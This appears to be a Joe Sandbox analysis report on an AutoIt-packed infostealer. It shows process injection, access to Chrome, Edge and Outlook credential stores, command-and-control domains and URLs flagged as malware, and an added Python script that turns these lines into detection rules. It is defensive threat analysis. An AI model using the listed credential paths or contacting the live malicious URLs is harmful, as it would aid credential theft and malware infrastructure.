            Source: gaJjobDqjDYWsfRWPZSKY.exe, 00000003.00000002.4507202262.0000000001411000.00000002.00000001.00040000.00000000.sdmp; gaJjobDqjDYWsfRWPZSKY.exe, 00000003.00000000.2111646852.0000000001411000.00000002.00000001.00040000.00000000.sdmp; gaJjobDqjDYWsfRWPZSKY.exe, 00000006.00000000.2259883925.00000000013D1000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe; code function 0_2_00C30698: cpuid
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe; code function 0_2_00C88195: GetLocalTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetCurrentDirectoryW, SetCurrentDirectoryW, SetCurrentDirectoryW, SetCurrentDirectoryW, SetCurrentDirectoryW, SetCurrentDirectoryW
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe; code function 0_2_00C6D27A: GetUserNameW
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe; code function 0_2_00C4B952: _free, _free, _free, GetTimeZoneInformation, WideCharToMultiByte, WideCharToMultiByte, _free
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe; code function 0_2_00C142DE: GetVersionExW, GetCurrentProcess, IsWow64Process, LoadLibraryA, GetProcAddress, GetNativeSystemInfo, FreeLibrary, GetSystemInfo, GetSystemInfo

            Stealing of Sensitive Information

            Source: Yara match; file source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match; file source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; file source: 00000004.00000002.4506129755.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; file source: 00000004.00000002.4507614075.0000000002C80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; file source: 00000002.00000002.2187412228.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; file source: 00000006.00000002.4509692516.0000000005230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; file source: 00000004.00000002.4507710541.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; file source: 00000002.00000002.2187102525.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; file source: 00000002.00000002.2187890119.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; file source: 00000003.00000002.4507743693.0000000002BB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\netbtugc.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\netbtugc.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\netbtugc.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\netbtugc.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\netbtugc.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\netbtugc.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\netbtugc.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\netbtugc.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\netbtugc.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Source: BP-50C26_20241220_082241.exe; Binary or memory string: WIN_81
            Source: BP-50C26_20241220_082241.exe; Binary or memory string: WIN_XP
            Source: BP-50C26_20241220_082241.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
            Source: BP-50C26_20241220_082241.exe; Binary or memory string: WIN_XPe
            Source: BP-50C26_20241220_082241.exe; Binary or memory string: WIN_VISTA
            Source: BP-50C26_20241220_082241.exe; Binary or memory string: WIN_7
            Source: BP-50C26_20241220_082241.exe; Binary or memory string: WIN_8
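            The process-creation lines in the HIPS / PFW section above and the browser-file and Outlook-key accesses in this section are the observations a detection engineer would turn into rules. The script below is an added example, not part of the Joe Sandbox report or of any Joe Security tooling: it parses behaviour lines in the "Source: <process>; Process created / File opened / Key opened: ..." shape used on this page and runs three triage heuristics over them. The rule names, the svchost.exe heuristic (started outside services.exe with no "-k <group>" argument), the image-vs-command-line mismatch check and the owner allowlist in STORE_OWNERS are the editor's assumptions; REPORT_LINES is constructed from this page's own lines, with paths reproduced as they appear.

```python
"""Triage heuristics over Joe Sandbox behaviour lines.

Added example; not part of the Joe Sandbox report or its tooling.  The
rules and the STORE_OWNERS allowlist are assumptions made for illustration.
"""
import ntpath
import re
from dataclasses import dataclass
from typing import Optional

# Shape of the report's lines, with an optional "; " after the acting process
# and the page's trailing "Jump to behavior" link residue tolerated and dropped.
LINE_RE = re.compile(
    r"^Source: (?P<source>.+?\.exe)(?:;\s*)?"
    r"(?P<kind>Process created|File opened|Key opened): "
    r"(?P<rest>.+?)(?:Jump to behavior)?$"
)
# "<child image path> <command line>" as printed for process creation.
PROC_RE = re.compile(r"^(?P<image>.+?\.exe) (?P<cmdline>.+)$", re.IGNORECASE)


@dataclass
class Event:
    source: str        # process that performed the action
    kind: str          # "Process created", "File opened" or "Key opened"
    target: str        # child image path, file path or registry key
    cmdline: str = ""  # child command line (process creation only)


def parse_line(line: str) -> Optional[Event]:
    """Parse one behaviour line; None for lines of any other shape."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    source, kind, rest = m.group("source"), m.group("kind"), m.group("rest").strip()
    if kind == "Process created":
        p = PROC_RE.match(rest)
        if p:
            return Event(source, kind, p.group("image"), p.group("cmdline").strip())
    return Event(source, kind, rest)


def first_token(cmdline: str) -> str:
    """Executable named by a Windows command line (quoted or bare first token)."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return cmdline[1:end] if end > 0 else cmdline[1:]
    return cmdline.split(" ", 1)[0]


def base_name(path: str) -> str:
    return ntpath.basename(path).lower()


def image_cmdline_mismatch(ev: Event) -> bool:
    """The created process's image differs from the executable its command line
    names.  A hollowed target keeps the payload's command line, which is what
    the svchost.exe line on this page shows."""
    if ev.kind != "Process created" or not ev.cmdline:
        return False
    return base_name(ev.target) != base_name(first_token(ev.cmdline))


def svchost_without_service_group(ev: Event) -> bool:
    """svchost.exe not started by services.exe and lacking a '-k <group>'
    argument; genuine service hosts have both (assumed heuristic)."""
    if ev.kind != "Process created" or base_name(ev.target) != "svchost.exe":
        return False
    return base_name(ev.source) != "services.exe" and " -k " not in f" {ev.cmdline.lower()} "


# Credential stores and the applications expected to open them (assumption).
STORE_OWNERS = {
    r"\google\chrome\user data": {"chrome.exe"},
    r"\microsoft\edge\user data": {"msedge.exe"},
    r"\windows messaging subsystem\profiles\outlook": {"outlook.exe"},
}


def credential_store_access(ev: Event) -> bool:
    """A browser profile or Outlook profile opened by a process other than
    the application that owns it."""
    if ev.kind not in ("File opened", "Key opened"):
        return False
    target = ev.target.lower()
    for marker, owners in STORE_OWNERS.items():
        if marker in target:
            return base_name(ev.source) not in owners
    return False


RULES = [image_cmdline_mismatch, svchost_without_service_group, credential_store_access]


def triage(lines):
    """Return (rule name, acting process, target) for every rule hit, in line order."""
    findings = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        findings.extend((rule.__name__, ev.source, ev.target) for rule in RULES if rule(ev))
    return findings


# Constructed input: this report's process-creation, file-open and key-open lines.
_GAJ = r"C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe"
_CHROME = r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default"
_EDGE = r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default"
REPORT_LINES = [
    r'Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe; Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\BP-50C26_20241220_082241.exe"',
    "Source: " + _GAJ + r'; Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"',
    r'Source: C:\Windows\SysWOW64\netbtugc.exe; Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"',
] + [
    r"Source: C:\Windows\SysWOW64\netbtugc.exe; File opened: " + p
    for p in (_CHROME + r"\Cookies", _CHROME + r"\Network\Cookies", _CHROME + r"\Web Data",
              _CHROME + r"\Login Data", _EDGE + r"\Login Data", _CHROME + r"\Local State",
              _CHROME + r"\Network\Local State", _EDGE + r"\Network\Cookies")
] + [
    r"Source: C:\Windows\SysWOW64\netbtugc.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook" + "\\",
]

if __name__ == "__main__":
    for name, src, target in triage(REPORT_LINES):
        print(f"{name:30} {base_name(src):14} {target}")
```

            Run against the page's lines the script raises eleven findings: the svchost.exe creation trips both process rules (its command line names the dropped sample, not svchost.exe, and there is no "-k" service group), and all eight browser-profile files plus the Outlook profile key are flagged because netbtugc.exe, not chrome.exe, msedge.exe or outlook.exe, opened them. The netbtugc.exe and firefox.exe creations pass both process rules, so an unsigned, non-inventory binary living in SysWOW64 still needs a separate check (code-signing or a known-good file list) that this offline example cannot do.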

            Remote Access Functionality

            Source: Yara match; file source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match; file source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; file source: 00000004.00000002.4506129755.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; file source: 00000004.00000002.4507614075.0000000002C80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; file source: 00000002.00000002.2187412228.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; file source: 00000006.00000002.4509692516.0000000005230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; file source: 00000004.00000002.4507710541.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; file source: 00000002.00000002.2187102525.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; file source: 00000002.00000002.2187890119.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; file source: 00000003.00000002.4507743693.0000000002BB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe; code function 0_2_00C91204: socket, WSAGetLastError, bind, WSAGetLastError, closesocket, listen, WSAGetLastError, closesocket
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe; code function 0_2_00C91806: socket, WSAGetLastError, bind, WSAGetLastError, closesocket
            MITRE ATT&CK matrix, one tactic per line. The number in parentheses is the per-technique hit count shown on the page; techniques listed without a number are the matrix template cells that were not observed for this sample.

            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
            Initial Access: Valid Accounts (2); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
            Execution: Native API (1); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
            Persistence: DLL Side-Loading (1); Valid Accounts (2); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
            Privilege Escalation: Exploitation for Privilege Escalation (1); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Process Injection (412); Startup Items; Scheduled Task/Job; At
            Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (3); DLL Side-Loading (1); Valid Accounts (2); Virtualization/Sandbox Evasion (12); Access Token Manipulation (21); Process Injection (412)
            Credential Access: OS Credential Dumping (1); Input Capture (21); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
            Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (116); Security Software Discovery (241); Virtualization/Sandbox Evasion (12); Process Discovery (3); Application Window Discovery (11); System Owner/User Discovery (1)
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
            Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Input Capture (21); Clipboard Data (3); GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
            Command and Control: Ingress Tool Transfer (4); Encrypted Channel (1); Non-Application Layer Protocol (4); Application Layer Protocol (4); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
            Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
Behavior Graph (ID: 1585941; Sample: BP-50C26_20241220_082241.exe; Startdate: 08/01/2025; Architecture: WINDOWS; Score: 100)

Graph nodes and edges, written out as a process tree (numbers in front of entries are the graph's node ids; a number in parentheses after a process name is the count badge shown on that node, as extracted):

Node 2 (start): BP-50C26_20241220_082241.exe
  DNS/IP: 28 www.joyesi.xyz (2->28); 30 www.shenzhoucui.com (2->30); 32 "17 other IPs or domains" (2->32)
    28->48: Performs DNS queries to domains with low reputation
  Signatures: 42 Suricata IDS alerts for network traffic; 44 Malicious sample detected (through community Yara rule); 46 Antivirus detection for URL or domain; 50 "6 other signatures"
  started: 10 BP-50C26_20241220_082241.exe (1)
Node 10: BP-50C26_20241220_082241.exe
  Signatures: 62 Binary is likely a compiled AutoIt script file; 64 Found API chain indicative of sandbox detection; 66 Writes to foreign memory regions; 68 "2 other signatures"
  started: 13 svchost.exe
Node 13: svchost.exe
  Signatures: 70 Maps a DLL or memory area into another process
  injected: 16 gaJjobDqjDYWsfRWPZSKY.exe
Node 16: gaJjobDqjDYWsfRWPZSKY.exe (injected)
  Signatures: 40 Found direct / indirect Syscall (likely to bypass EDR)
  started: 19 netbtugc.exe (13)
Node 19: netbtugc.exe
  Signatures: 52 Tries to steal Mail credentials (via file / registry access); 54 Tries to harvest and steal browser information (history, passwords, etc); 56 Modifies the context of a thread in another process (thread injection); 58 "3 other signatures"
  injected: 22 gaJjobDqjDYWsfRWPZSKY.exe
  started: 26 firefox.exe
Node 22: gaJjobDqjDYWsfRWPZSKY.exe (injected)
  DNS/IP: 34 www.rssnewscast.com, 91.195.240.94, ports 49985, 49986, 49987, SEDO-ASDE, Germany (22->34); 36 elettrosistemista.zip, 195.110.124.133, ports 49993, 49994, 49995, REGISTER-ASIT, Italy (22->36); 38 "5 other IPs or domains" (22->38)
  Signatures: 60 Found direct / indirect Syscall (likely to bypass EDR)

Source | Detection | Scanner | Label
BP-50C26_20241220_082241.exe | 37% | ReversingLabs | Win32.Trojan.AutoitInject
BP-50C26_20241220_082241.exe | 100% | Avira | DR/AutoIt.Gen8
BP-50C26_20241220_082241.exe | 100% | Joe Sandbox ML | -
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
Source | Detection | Scanner | Label
http://www.goldenjade-travel.com/fo8o/?Dvh=YnI07v&Ubhdm=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ== | 100% | Avira URL Cloud | malware
http://www.elettrosistemista.zip/fo8o/?Dvh=YnI07v&Ubhdm=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ== | 100% | Avira URL Cloud | malware
https://www.empowermedeco.com/fo8o/?Ubhdm=mxnR | 0% | Avira URL Cloud | safe
http://www.3xfootball.com/fo8o/?Dvh=YnI07v&Ubhdm=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzIiuR4u4IIkzi3Kqqtd6zR7shSxwh28NyLEf3/mFmUyU2g== | 0% | Avira URL Cloud | safe
http://www.empowermedeco.com/fo8o/?Ubhdm=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&Dvh=YnI07v | 0% | Avira URL Cloud | safe
http://www.rssnewscast.com/fo8o/?Ubhdm=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&Dvh=YnI07v | 100% | Avira URL Cloud | malware
http://www.empowermedeco.com | 0% | Avira URL Cloud | safe
http://www.magmadokum.com/fo8o/?Dvh=YnI07v&Ubhdm=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMWAnWKRmrKgMQiWi7WA8E0wwbeEcZziILA/VBeUyRYh4cA== | 0% | Avira URL Cloud | safe
http://www.techchains.info/fo8o/ | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
elettrosistemista.zip | 195.110.124.133 | true | false | - | high
empowermedeco.com | 217.196.55.202 | true | false | - | high
www.3xfootball.com | 154.215.72.110 | true | false | - | high
www.goldenjade-travel.com | 116.50.37.244 | true | false | - | high
www.rssnewscast.com | 91.195.240.94 | true | false | - | high
www.techchains.info | 66.29.149.46 | true | false | - | high
natroredirect.natrocdn.com | 85.159.66.93 | true | false | - | high
www.magmadokum.com | unknown | unknown | true | - | unknown
www.donnavariedades.com | unknown | unknown | false | - | high
www.660danm.top | unknown | unknown | true | - | unknown
www.joyesi.xyz | unknown | unknown | false | - | high
www.liangyuen528.com | unknown | unknown | true | - | unknown
www.kasegitai.tokyo | unknown | unknown | true | - | unknown
www.empowermedeco.com | unknown | unknown | false | - | high
www.k9vyp11no3.cfd | unknown | unknown | true | - | unknown
www.elettrosistemista.zip | unknown | unknown | false | - | high
www.shenzhoucui.com | unknown | unknown | true | - | unknown
www.antonio-vivaldi.mobi | unknown | unknown | true | - | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.empowermedeco.com/fo8o/?Ubhdm=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&Dvh=YnI07v | true | Avira URL Cloud: safe | unknown
http://www.elettrosistemista.zip/fo8o/?Dvh=YnI07v&Ubhdm=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ== | true | Avira URL Cloud: malware | unknown
http://www.empowermedeco.com/fo8o/ | false | - | high
http://www.elettrosistemista.zip/fo8o/ | false | - | high
http://www.magmadokum.com/fo8o/ | false | - | high
http://www.rssnewscast.com/fo8o/ | false | - | high
http://www.rssnewscast.com/fo8o/?Ubhdm=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&Dvh=YnI07v | true | Avira URL Cloud: malware | unknown
http://www.3xfootball.com/fo8o/?Dvh=YnI07v&Ubhdm=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzIiuR4u4IIkzi3Kqqtd6zR7shSxwh28NyLEf3/mFmUyU2g== | true | Avira URL Cloud: safe | unknown
http://www.goldenjade-travel.com/fo8o/?Dvh=YnI07v&Ubhdm=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ== | true | Avira URL Cloud: malware | unknown
http://www.goldenjade-travel.com/fo8o/ | false | - | high
http://www.magmadokum.com/fo8o/?Dvh=YnI07v&Ubhdm=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMWAnWKRmrKgMQiWi7WA8E0wwbeEcZziILA/VBeUyRYh4cA== | true | Avira URL Cloud: safe | unknown
http://www.techchains.info/fo8o/ | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | netbtugc.exe, 00000004.00000003.2372596160.0000000007968000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://duckduckgo.com/ac/?q= | netbtugc.exe, 00000004.00000003.2372596160.0000000007968000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | netbtugc.exe, 00000004.00000003.2372596160.0000000007968000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | netbtugc.exe, 00000004.00000003.2372596160.0000000007968000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | netbtugc.exe, 00000004.00000003.2372596160.0000000007968000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://www.empowermedeco.com | gaJjobDqjDYWsfRWPZSKY.exe, 00000006.00000002.4509692516.00000000052A1000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | netbtugc.exe, 00000004.00000003.2372596160.0000000007968000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_ | netbtugc.exe, 00000004.00000002.4510433647.0000000005E70000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4508760294.000000000426E000.00000004.10000000.00040000.00000000.sdmp, gaJjobDqjDYWsfRWPZSKY.exe, 00000006.00000002.4507909264.00000000039BE000.00000004.00000001.00040000.00000000.sdmp | false | - | high
https://www.sedo.com/services/parking.php3 | gaJjobDqjDYWsfRWPZSKY.exe, 00000006.00000002.4507909264.00000000039BE000.00000004.00000001.00040000.00000000.sdmp | false | - | high
https://ac.ecosia.org/autocomplete?q= | netbtugc.exe, 00000004.00000003.2372596160.0000000007968000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://codepen.io/uzcho_/pens/popular/?grid_type=list | netbtugc.exe, 00000004.00000002.4508760294.0000000004592000.00000004.10000000.00040000.00000000.sdmp, gaJjobDqjDYWsfRWPZSKY.exe, 00000006.00000002.4507909264.0000000003CE2000.00000004.00000001.00040000.00000000.sdmp | false | - | high
https://codepen.io/uzcho_/pen/eYdmdXw.css | netbtugc.exe, 00000004.00000002.4508760294.0000000004592000.00000004.10000000.00040000.00000000.sdmp, gaJjobDqjDYWsfRWPZSKY.exe, 00000006.00000002.4507909264.0000000003CE2000.00000004.00000001.00040000.00000000.sdmp | false | - | high
https://www.empowermedeco.com/fo8o/?Ubhdm=mxnR | netbtugc.exe, 00000004.00000002.4508760294.0000000004BDA000.00000004.10000000.00040000.00000000.sdmp, gaJjobDqjDYWsfRWPZSKY.exe, 00000006.00000002.4507909264.000000000432A000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | netbtugc.exe, 00000004.00000003.2372596160.0000000007968000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | netbtugc.exe, 00000004.00000003.2372596160.0000000007968000.00000004.00000020.00020000.00000000.sdmp | false | - | high
IP | Domain | Country | ASN | ASN Name | Malicious
91.195.240.94 | www.rssnewscast.com | Germany | 47846 | SEDO-ASDE | false
154.215.72.110 | www.3xfootball.com | Seychelles | 132839 | POWERLINE-AS-APPOWERLINEDATACENTERHK | false
195.110.124.133 | elettrosistemista.zip | Italy | 39729 | REGISTER-ASIT | false
116.50.37.244 | www.goldenjade-travel.com | Taiwan; Republic of China (ROC) | 18046 | DONGFONG-TWDongFongTechnologyCoLtdTW | false
85.159.66.93 | natroredirect.natrocdn.com | Turkey | 34619 | CIZGITR | false
66.29.149.46 | www.techchains.info | United States | 19538 | ADVANTAGECOMUS | false
217.196.55.202 | empowermedeco.com | Norway | 29300 | AS-DIRECTCONNECTNO | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1585941
Start date and time: 2025-01-08 14:58:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 19s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: BP-50C26_20241220_082241.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/2@16/7
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 95%
• Number of executed functions: 45
